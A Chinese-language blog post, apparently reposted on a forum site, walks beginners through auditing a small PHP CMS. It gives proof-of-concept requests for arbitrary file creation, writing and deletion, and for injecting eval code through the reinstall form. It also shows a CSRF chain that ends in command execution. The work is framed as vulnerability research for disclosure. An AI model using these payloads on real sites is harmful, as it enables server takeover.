0
  • 聊天消息
  • 系統(tǒng)消息
  • 評論與回復
登錄后你可以
  • 下載海量資料
  • 學習在線課程
  • 觀看技術視頻
  • 寫文章/發(fā)帖/加入社區(qū)
會員中心
創(chuàng)作中心

完善資料讓更多小伙伴認識你,還能領取20積分哦,立即完善>

3天內(nèi)不再提示

某CMS的命令執(zhí)行漏洞通用挖掘思路分享

jf_hKIAo4na ? 來源:菜鳥學安全 ? 2023-05-18 17:18 ? 次閱讀

0x01 前言

大概是在上半年提交了某個CMS的命令執(zhí)行漏洞,現(xiàn)在過了那么久,也想通過這次挖掘通用型漏洞,整理一下挖掘思路,分享給大家。

0x02 挖掘前期

一、CMS選擇

如果你是第一次挖白盒漏洞,那么建議你像我一樣,先找一些簡單的來挖掘。

具體源碼下載地址可以參考:

https://github.com/search?q=cms
https://search.gitee.com/?skin=rec&type=repository&q=cms
https://down.chinaz.com/
https://www.a5xiazai.com/
......

百度找找,肯定不止這些

那么應該怎么選擇呢(這里我是站在第一次挖掘,或者僅使用過掃描工具掃描的師傅的角度這樣說的,如果做過開發(fā),代碼功底很強等情況,emm...當我沒說。):

1、找最新版的版本較低的,例如1.1、1.2
2、找github star不多的
3、找源碼總?cè)萘啃〉?4、盡量不要找使用tp、yii、laravel等框架型CMS

這里說一下理由:
1、如果cms版本高,說明開發(fā)有經(jīng)常維護,同時也說明里面的簡單漏洞已經(jīng)被發(fā)現(xiàn)并且被提交并整改了。(具體這個可以看看CMS官網(wǎng)放出的更新日志)

2、為什么找github star不多的cms?很簡單,使用的人不多,沒人標星,功能也比較少。


3、源碼少容易看啊,而且想著源代碼就那么點,看著也不會太心累。


4、這是我個人的理解哈,因為就像很多人說的,第一個審的可以看看bluecms。為什么?因為簡單啊,tp框架首先各種C方法,I方法的,就夠頭疼了。

e8022e22-f143-11ed-90ce-dac502259ad0.pnge821c156-f143-11ed-90ce-dac502259ad0.png

扯了那么多,總結(jié)一句話:

跟挖SRC一樣,如果你一開始就瞄著阿里SRC、百度SRC等來挖掘,一直挖不到洞,是不是心態(tài)崩了呢;如果你一開始借助nday的poc,結(jié)合fofa搜集資產(chǎn),一下子就能挖到簡單、小型企業(yè)的漏洞,雖然可能漏洞獎金不多、但是滿滿的成就感有沒有~

代碼審計也是一樣的,一開始就找框架型的,MVC架構的CMS,不僅可能看不懂代碼,還可能連路由都弄不懂呢。所以一開始還是找些簡單的練練手比較好~

二、環(huán)境準備

1、PHPstudy

PHP、中間件、數(shù)據(jù)庫,一個軟件搞定,反正我是覺得用著很香。

e82bee2e-f143-11ed-90ce-dac502259ad0.png

2、代碼掃描工具

目前的話我用的比較多的是seay和fortify。這里其實都一樣,不是所有漏洞都是要通讀代碼來發(fā)現(xiàn)的,有的時候借助工具可以快很多。

e847d5a8-f143-11ed-90ce-dac502259ad0.pnge8592470-f143-11ed-90ce-dac502259ad0.png

3、BurpSuite

滲透測試神器級別的工具,這里不多介紹了,畢竟挖漏洞不抓包怎么行呢。

e863b4ee-f143-11ed-90ce-dac502259ad0.png

4、漏洞掃描工具

雖然我們拿到了源碼,但是挖漏洞也不一定要從代碼上進行呀,可以結(jié)合黑盒的方式,黑白盒一起,更容易挖到漏洞,也就是業(yè)內(nèi)說的灰盒測試。

掃描工具這里推薦Xray+burp聯(lián)動進行。隨便抓幾個包,有沒有漏洞一目了然,讓我們可以在測試漏洞的時候,還同時進行掃描。

e8885a42-f143-11ed-90ce-dac502259ad0.png

5、編輯器

編輯器的作用是方便查看代碼,在有需要的時候才用,這里可以算是我水字數(shù)吧,我個人比較喜歡nopad++,當然別的也是可以的,phpstorm最好,可以快捷進行函數(shù)跳轉(zhuǎn)。

工具下載地址:

https://www.xp.cn/
https://github.com/f1tz/cnseay
https://github.com/chaitin/xray/releases

三、搭建環(huán)境

1、首先下載源碼,解壓并放到phpstudy安裝目錄下的WWW文件夾中

e89d2c60-f143-11ed-90ce-dac502259ad0.png

2、安裝方法一般是請求http://127.0.0.1/install/就可以了,按照提示輸入信息。

e8c2e70c-f143-11ed-90ce-dac502259ad0.png

3、提示安裝成功即可

e8d97fb2-f143-11ed-90ce-dac502259ad0.png

0x03 挖掘中期

一、代碼掃描

借助seay自帶的自動審計功能進行代碼掃描 e8f7501e-f143-11ed-90ce-dac502259ad0.png

二、黑白盒配合發(fā)現(xiàn)漏洞

這個其實是很有搞頭的,這里沒有詳細說是因為當時確實重心在白盒上,實際上我感覺這個發(fā)現(xiàn)漏洞再去找對應的代碼,會更加有趣些。

1、瀏覽器設置代理,指向burp:127.0.0.1:8080

e9181c72-f143-11ed-90ce-dac502259ad0.pnge9315106-f143-11ed-90ce-dac502259ad0.png ? 2、burp設置代理,指向xray:127.0.0.1:7777 e9411686-f143-11ed-90ce-dac502259ad0.png ? 3、開啟xray被動掃描,命令:

./xray_darwin_amd64 webscan --listen 127.0.0.1:7777 --html-output test.html
e9549ddc-f143-11ed-90ce-dac502259ad0.png ? 4、在每個功能點都點一點,就跟正常測黑盒即可 e9661a30-f143-11ed-90ce-dac502259ad0.png ? 5、查看xray掃描結(jié)果 e9827e6e-f143-11ed-90ce-dac502259ad0.png ? 6、查看代碼掃描結(jié)果 e99bf772-f143-11ed-90ce-dac502259ad0.png ?

三、分析掃描結(jié)果

1、將結(jié)果一個個點擊查看,分析漏洞是否真實存在 因為工具是按照正則匹配來進行掃描的,總會出現(xiàn)一些可能存在,但是實際不存在的情況,例如這個: e9b74fcc-f143-11ed-90ce-dac502259ad0.png ? 因為$_G['SYSTEM']['PATH']疑似為可控變量,所以爆出任意文件包含漏洞,那么實際上,往上看可以發(fā)現(xiàn)$_G['SYSTEM']['PATH']其實已經(jīng)事先定義好了。 e9c64888-f143-11ed-90ce-dac502259ad0.png ? 2、定位漏洞
1)發(fā)現(xiàn)一個file_get_contents,可控變量為$path e9d221bc-f143-11ed-90ce-dac502259ad0.png ? 往前看,$path為我們直接get傳入,只是做了一些限制與鑒權,沒有進行過濾 e9f301fc-f143-11ed-90ce-dac502259ad0.png

$path = realpath($_GET['path']);
if (!$path) {
    if (!InArray('edit,save,del,mkdir,mkfile', $type) && !$_G['GET']['JSON']) {
        PkPopup('{content:"不存在的路徑,請求路徑:' . $_GET['path'] . '",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
    }
    ExitJson('不存在的路徑,請求路徑:' . $_GET['path']);
}
$_G['TEMP']['PATH'] = iconv('GBK', 'UTF-8//IGNORE', $path);
if (strpos($path, $spath) !== 0) {
    if (!InArray('edit,save,del,mkdir,mkfile', $type) && !$_G['GET']['JSON']) {
        PkPopup('{content:"越權操作,請求路徑:' . $_GET['path'] . '",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
    }
    ExitJson('越權操作,請求路徑:' . $_GET['path']);
}


switch ($type) {
    case 'edit' :
        if (filetype($path) != 'file') {
            if ($_G['GET']['JSON']) {
                ExitJson('不存在的文件');
            }
            PkPopup('{content:"不存在的文件",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
        }
        $suffix = substr($path, strrpos($path, '.') + 1);
        if (!InArray($suffixs, $suffix)) {
            if ($_G['GET']['JSON']) {
                ExitJson('不支持的文件格式');
            }
            PkPopup('{content:"不支持的文件格式",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
        }
        $filecontent1 = file_get_contents($path);
        $filecontent = htmlspecialchars($filecontent1, ENT_QUOTES);
        if ($filecontent1 && !$filecontent) {
            if ($_G['GET']['JSON']) {
                ExitJson('不支持該文件編碼,僅支持UTF-8');
            }
            PkPopup('{content:"不支持該文件編碼,僅支持UTF-8",icon:2,shade:1,hideclose:1,submit:function(){location.href="index.php?c=app&a=filesmanager:index&path="}}');
        }
        if ($_G['GET']['JSON']) {
            ExitJson($filecontent1, TRUE);
        }
        $path = str_replace('\', '/', $path);
        $paths = explode('/', $path);
        $path = '';
        for ($i = 0; $i < count($paths); $i++) {
            if ($i == count($paths) - 1) {
                $filename = $paths[$i];
            } else {
                $path .= $paths[$i] . '/';
            }
        }
        ExitGourl('index.php?c=app&a=filesmanager:index&path=' . urlencode(realpath($path)) . '&editbtn=' . md5($filename));
        break;
2)往下看,對$path進行unlink(),即刪除操作

ea08abe2-f143-11ed-90ce-dac502259ad0.png

case 'del' :
        $r = unlink($path);
        ExitJson('操作完成', $r);
        break;
3)再往下,傳入mkname,使用file_put_contents進行文件創(chuàng)建,內(nèi)容為空。很明顯只是檢測是否存在重復創(chuàng)建的情況,未進行過濾。

ea1253ea-f143-11ed-90ce-dac502259ad0.png

case 'mkfile' :
        $mkname = $_GET['mkname'];
        if (!$mkname) {
            ExitJson('請輸入目錄或文件的名稱');
        }
        if ($type == 'mkdir') {
            if (file_exists($path . "/{$mkname}")) {
                ExitJson('目錄已存在');
            }
            $r = mkdir($path . "/{$mkname}");
        } else {
            if (file_exists($path . "/{$mkname}")) {
                ExitJson('文件已存在');
            }
            $r = file_put_contents($path . "/{$mkname}", '');
        }
        ExitJson('操作完成', $r === FALSE ? FALSE : TRUE);
        break;
}
3、研究路由,查看如何調(diào)用漏洞函數(shù) 1)首先查看這個漏洞路徑,字面上意思是在/app/目錄下的一個文件管理的操作
/app/filesmanager/index.php
2)回到網(wǎng)站,剛剛黑盒測試的時候,發(fā)現(xiàn)路由規(guī)律為: ea2524e8-f143-11ed-90ce-dac502259ad0.pngea330fe0-f143-11ed-90ce-dac502259ad0.png ? 請求了http://url/index.php?c=read&id=1&page=1后,會發(fā)出這樣的一個請求:
/index.php?c=app&a=puyuetianeditor:index&s=myfiles&page=1
通過a=puyuetianeditor:index,定位文件位置為/app/puyuetianeditor/index.php ea4328d0-f143-11ed-90ce-dac502259ad0.png ? 3)在文件中看到繼續(xù)請求了'/app/puyuetianeditor/phpscript/' . $_G['GET']['S'] . '.php,在URL中可以看到s傳入的參數(shù)為myfiles,所以可以定位文件路徑為:
/app/puyuetianeditor/phpscript/myfiles.php

ea53b3f8-f143-11ed-90ce-dac502259ad0.png

4)漏洞路徑/app/filesmanager/index.php即可以對應URL

/?c=app&a=filesmanager:index

四、驗證漏洞

任意創(chuàng)建文件

1、搭建網(wǎng)站并登錄進網(wǎng)站后臺 ea6601a2-f143-11ed-90ce-dac502259ad0.png ? 2、漏洞存在點為/app/filesmanager/index.php

ea872c74-f143-11ed-90ce-dac502259ad0.png

3、進行一些操作后,通過file_put_contents創(chuàng)建文件,poc:

http://127.0.0.1/index.php?c=app&a=filesmanager:index&type=mkfile&mkname=123.php
ea96b9dc-f143-11ed-90ce-dac502259ad0.png ? 4、在網(wǎng)站根目錄可以看到文件創(chuàng)建成功 eaa69cbc-f143-11ed-90ce-dac502259ad0.png ?

任意文件寫入

poc:

http://127.0.0.1/index.php?c=app&a=filesmanager:index&type=save&path=123.php
POST:
filecontent=
eab58592-f143-11ed-90ce-dac502259ad0.png ? 可以看到文件內(nèi)容成功寫入 eacc5448-f143-11ed-90ce-dac502259ad0.png ? 嘗試執(zhí)行命令 eaf64b54-f143-11ed-90ce-dac502259ad0.png ?

任意文件刪除

poc:

http://127.0.0.1/index.php?c=app&a=filesmanager:index&type=del&path=123.php
eb1b3fe0-f143-11ed-90ce-dac502259ad0.png ? 漏洞文件存在的路徑為/app/filesmanager/index.php eb2a582c-f143-11ed-90ce-dac502259ad0.png ? 可以看到123.php文件已成功刪除。 eb3accfc-f143-11ed-90ce-dac502259ad0.png ?

五、組合漏洞擴大成果

1、任意文件刪除配合系統(tǒng)重裝(失?。?/strong>

以前就有看到過這樣的漏洞,因為系統(tǒng)重裝的時候,會將用戶輸入的配置信息寫入到php文件中,那么如果可以輸入代碼,便可以成功執(zhí)行了,這里嘗試一下。


1)首先查看index.php文件
只要install.locked文件存在即表示網(wǎng)站已安裝

eb47f3e6-f143-11ed-90ce-dac502259ad0.png ? 2)再看/install/index.php,可以看到也是這個文件存在即不能重裝系統(tǒng)。 eb6bf930-f143-11ed-90ce-dac502259ad0.png

3)通過任意文件刪除,將此文件進行刪除:

http://192.168.150.9/index.php?c=app&a=filesmanager:index&type=del&path=C://phpStudy/WWW/install/install.locked
eb7c3dfe-f143-11ed-90ce-dac502259ad0.png ? 4)訪問/install/index.php即可進行重裝系統(tǒng)操作 eb8dc7a4-f143-11ed-90ce-dac502259ad0.png ? 5)正常執(zhí)行,在step=2的時候,輸入數(shù)據(jù)庫等信息 ebafabc6-f143-11ed-90ce-dac502259ad0.pngebc36efe-f143-11ed-90ce-dac502259ad0.png ? 定位到/phpscript/environment.php文件 ebe852e6-f143-11ed-90ce-dac502259ad0.png ? 再到/template/environment.hst ebf585c4-f143-11ed-90ce-dac502259ad0.png ? 發(fā)現(xiàn)關鍵字mysql_username ec095946-f143-11ed-90ce-dac502259ad0.png ? 全局搜索一下,定位文件位置: ec2c8182-f143-11ed-90ce-dac502259ad0.pngec49c1c0-f143-11ed-90ce-dac502259ad0.png ? 可以看到配置信息最后會寫入到這里。 ec7f0c04-f143-11ed-90ce-dac502259ad0.png ? 6)抓取傳入信息的數(shù)據(jù)包,進行測試 eca33b42-f143-11ed-90ce-dac502259ad0.png ? 多次fuzz,確認確實可以寫入一些東西
POST /install/index.php?step=3 HTTP/1.1
Host: 192.168.150.9
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:93.0) Gecko/20100101 Firefox/93.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 302
Origin: http://192.168.150.9
Connection: close
Referer: http://192.168.150.9/install/index.php?step=2
Cookie: PHPSESSID=b9imt0v97o8hsml01jr0tro9n3; UIA=KXoyLywxNlo2YDQtLl8tX2BlMjAqLzUqX103Y1xlZWBcMzFeXi4xXjQsYDBeMC8tZDEsXjIxMCoxLjIvXmQ1Y14w; app_puyuetianeditor_editcontent=%3Cbr%3E


_webos=*&mysql_type=mysql&mysql_location=127.0.0.1&mysql_username=root&mysql_password=root&mysql_database='eval($_REQUEST[1])&mysql_prefix=pk_&mysql_charset=set+names+utf8&adminusername=phpinfo();&adminpassword=phpinfo();&adminemail=admin%40qq.com&hs_username=&hs_password=&hs_domain=192.168.150.9
ecb6a34e-f143-11ed-90ce-dac502259ad0.png ? 7)最后發(fā)現(xiàn)不能傳入;,否則會報錯 eccc644a-f143-11ed-90ce-dac502259ad0.png ? 8)假設傳入進去了,又會顯示403 ecf420ac-f143-11ed-90ce-dac502259ad0.pnged094bc6-f143-11ed-90ce-dac502259ad0.png ? 9)感覺有機會,后面就看師傅們嘗試了。。。 ?

2、任意文件寫入配合CSRF(成功)

在dedecms中看到過的漏洞,因為后臺的任意寫文件在沒有管理員權限的支持下無法利用,那么倘若配合CSRF漏洞,借用管理員的cookie便可以直接執(zhí)行,擴大漏洞危害。 在這里嘗試一下: 1)首先抓取寫入文件的數(shù)據(jù)包,可以看到?jīng)]有明顯的token等字段 ed181cd2-f143-11ed-90ce-dac502259ad0.png ? 2)在漏洞文件中只是看到了權限檢測 ed2f97fe-f143-11ed-90ce-dac502259ad0.png ? 3)使用burp生成任意文件寫入的CSRF漏洞POC,保存為test.html ed472252-f143-11ed-90ce-dac502259ad0.pnged6cdac4-f143-11ed-90ce-dac502259ad0.png ? 4)生成任意文件創(chuàng)建的CSRF漏洞POC ed87c87a-f143-11ed-90ce-dac502259ad0.png ? 5)將兩個文件整合到一起,并設置自動提交


   
  
  
    
6)在已登錄的瀏覽器中打開test.html文件,跳轉(zhuǎn)了幾次后,顯示ok,保存失敗 eda1862a-f143-11ed-90ce-dac502259ad0.png ? 跟前面任意文件寫入的返回是一樣的,在網(wǎng)站根目錄可以看到已經(jīng)成功寫入了 edb51df2-f143-11ed-90ce-dac502259ad0.png ? 執(zhí)行命令 edc9ff10-f143-11ed-90ce-dac502259ad0.png ?

0x04 挖掘后期&總結(jié)

挖掘后干嘛?提交漏洞唄~ 好的,這個算是剛開始學習沒多久挖掘到的漏洞,其實現(xiàn)在覺得技術含量不高,發(fā)現(xiàn)漏洞也不難,主要想分享一下過程以及思路。 最后,希望看到這篇文章到小伙伴也能很快挖掘到通用型漏洞~

審核編輯:彭靜
聲明:本文內(nèi)容及配圖由入駐作者撰寫或者入駐合作網(wǎng)站授權轉(zhuǎn)載。文章觀點僅代表作者本人,不代表電子發(fā)燒友網(wǎng)立場。文章及其配圖僅供工程師學習之用,如有內(nèi)容侵權或者其他違規(guī)問題,請聯(lián)系本站處理。 舉報投訴
  • 源碼
    +關注

    關注

    8

    文章

    626

    瀏覽量

    28967
  • 代碼
    +關注

    關注

    30

    文章

    4671

    瀏覽量

    67765
  • 漏洞
    +關注

    關注

    0

    文章

    203

    瀏覽量

    15259

原文標題:實戰(zhàn) | 某通用型漏洞挖掘思路分享

文章出處:【微信號:菜鳥學安全,微信公眾號:菜鳥學安全】歡迎添加關注!文章轉(zhuǎn)載請注明出處。

收藏 人收藏

    評論

    相關推薦

    小米路由器任意文件讀取及遠程命令執(zhí)行漏洞解析

    存在任意文件讀取漏洞和遠程命令執(zhí)行漏洞,攻擊者通過該漏洞可以獲取服務器權限,導致服務器失陷。 二、漏洞
    發(fā)表于 03-01 15:09 ?3142次閱讀

    AlphaFuzzer漏洞挖掘工具的使用

    AlphaFuzzer是一款多功能的漏洞挖掘工具,到現(xiàn)在為止,該程序以文件格式為主。1.0版本主要包含了:一個智能文件格式的漏洞挖掘框架。一個通用
    發(fā)表于 07-15 06:44

    開源鴻蒙 OpenHarmony 獲得 CVE 通用漏洞披露編號頒發(fā)資質(zhì)

    8月15日晚間,開源鴻蒙 OpenAtom OpenHarmony 官方宣布于 8 月 3 日獲得通過 CNA(通用漏洞披露編號授權機構)加入程序,成為 CVE(通用漏洞披露組織)的編
    發(fā)表于 08-17 11:34

    基于符號執(zhí)行技術實現(xiàn)的驅(qū)動程序的漏洞檢測

    思路,提出了一種基于符號執(zhí)行技術實現(xiàn)的驅(qū)動程序模擬環(huán)境,可以用于分析和檢測Linux設備驅(qū)動程序中存在的安全漏洞。該環(huán)境通過模擬內(nèi)核提供給驅(qū)動程序的服務接口,使驅(qū)動程序可以在應用層進行符號執(zhí)
    發(fā)表于 12-05 16:06 ?0次下載
    基于符號<b class='flag-5'>執(zhí)行</b>技術實現(xiàn)的驅(qū)動程序的<b class='flag-5'>漏洞</b>檢測

    Adobe發(fā)布安全更新,修復了Adobe Acrobat與Reader中多個關鍵安全漏洞

    據(jù)悉,在這87個漏洞中,共有39個高危漏洞,這將允許攻擊者在受感染計算機上執(zhí)行代碼或提升權限。代碼執(zhí)行漏洞可允許攻擊者在受感染計算機上
    的頭像 發(fā)表于 12-14 14:25 ?2760次閱讀

    ThinkPHP5.0.遠程代碼執(zhí)行漏洞預警

    Thinkphp5.0.*存在遠程代碼執(zhí)行漏洞。攻擊者可以利用漏洞實現(xiàn)任意代碼執(zhí)行等高危操作。
    的頭像 發(fā)表于 01-26 16:26 ?3197次閱讀
    ThinkPHP5.0.遠程代碼<b class='flag-5'>執(zhí)行</b><b class='flag-5'>漏洞</b>預警

    1433端口的SQL TOOL執(zhí)行命令錯誤應該如何修復詳細說明

    然后用SQL TOOLS連接主機,進行SQL或者CMD命令執(zhí)行,從而 得主機的控制權,但是服務器的管理人員通常會把一些不安全的漏洞補上,所以用sql tools直接執(zhí)行命令成功的幾率不
    發(fā)表于 11-22 16:20 ?2次下載

    思科升級遠程命令執(zhí)行等高危漏洞

    1月19日,思科發(fā)布了安全公告,旗下小型企業(yè)RV110W,RV130,RV130W和RV215W路由器中發(fā)現(xiàn)了遠程命令執(zhí)行等高危漏洞,建議盡快升級。以下是漏洞詳情:
    的頭像 發(fā)表于 01-20 15:40 ?1664次閱讀

    漏洞挖掘工具afrog軟件簡介

    afrog 是一款性能卓越、快速穩(wěn)定、PoC 可定制的漏洞掃描(挖洞)工具,PoC 涉及 CVE、CNVD、默認口令、信息泄露、指紋識別、未授權訪問、任意文件讀取、命令執(zhí)行等多種漏洞
    的頭像 發(fā)表于 09-13 09:06 ?1210次閱讀

    linux技術:WAF運行命令執(zhí)行方法

    如果命令執(zhí)行的時候遇到攔截命令關鍵詞的時候可以利用如下方法繞過: "和^是CMD命令中最常見的轉(zhuǎn)義字符,還有成對的括號并不會影響命令
    發(fā)表于 11-07 20:27 ?891次閱讀

    Linux命令執(zhí)行Bypass常見姿勢介紹

    部署服務器端為Linux系統(tǒng)的http服務,留存get和post方式的一句話木馬,用于命令執(zhí)行測試。(測試思路可以對話Chatgpt)
    的頭像 發(fā)表于 05-22 16:20 ?1863次閱讀
    Linux<b class='flag-5'>命令</b><b class='flag-5'>執(zhí)行</b>Bypass常見姿勢介紹

    Linux命令執(zhí)行Bypass常見姿勢

    部署服務器端為Linux系統(tǒng)的http服務,留存get和post方式的一句話木馬,用于命令執(zhí)行測試。(測試思路可以對話Chatgpt)
    的頭像 發(fā)表于 05-22 16:21 ?730次閱讀
    Linux<b class='flag-5'>命令</b><b class='flag-5'>執(zhí)行</b>Bypass常見姿勢

    系統(tǒng)邏輯漏洞挖掘實踐

    當談及安全測試時,邏輯漏洞挖掘一直是一個備受關注的話題,它與傳統(tǒng)的安全漏洞(如SQL注入、XSS、CSRF)不同,無法通過WAF、殺軟等安全系統(tǒng)的簡單掃描來檢測和解決。這類漏洞往往涉及
    的頭像 發(fā)表于 09-20 17:14 ?581次閱讀
    系統(tǒng)邏輯<b class='flag-5'>漏洞</b><b class='flag-5'>挖掘</b>實踐

    uboot命令執(zhí)行過程是什么

    U-boot是通過執(zhí)行u-boot提供的命令來加載Linux內(nèi)核的,其中 命令bootm的功能 即為從memory啟動Linux內(nèi)核映像文件。 在講解bootm加載內(nèi)核之前,先來看看u-boot中
    的頭像 發(fā)表于 12-04 17:31 ?590次閱讀

    bootm命令執(zhí)行流程

    Bootm命令用來從memory啟動內(nèi)核,bootm命令執(zhí)行流程如下圖所示。 在串口終端輸入bootm命令后,執(zhí)行do_bootm函數(shù)來完
    的頭像 發(fā)表于 12-04 17:33 ?886次閱讀
    bootm<b class='flag-5'>命令</b>的<b class='flag-5'>執(zhí)行</b>流程